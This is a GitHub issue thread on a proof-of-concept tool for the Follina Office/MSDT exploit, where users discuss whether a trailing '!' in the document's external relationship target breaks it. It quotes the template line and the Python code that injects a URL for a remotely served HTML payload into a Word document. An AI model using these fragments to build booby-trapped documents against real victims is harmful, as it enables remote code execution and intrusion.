### ISSUE TITLE
Intentional? 

### ISSUE THREAD

**Issue by Masrt200** [JohnHammond/msdt-follina#2]
in doc/word/_rels/document.xml.rels
```xml
Target="{staged_html}!"
```

[Follina.py](https://github.com/JohnHammond/msdt-follina/blob/main/follina.py) line 96
```
external_referral = external_referral.replace(
    "{staged_html}", f"http://{serve_host}:{args.port}/index.html"
)
```

**results,  Target="http://192.168.0.1:8000/index.html!"**
leaves so much to be desired xD

**Comment by WesyHub** [comment]
I don't know where is the problem ? it's supposed to be flexible for everyone, then why you prefer to add a static value that don't work in most case.

**Comment by Shadowwalker254** [comment]
seems like john re-edited the tool not to work

**Comment by Masrt200** [comment]
yea, self tinkering helped... a note describing this would be good
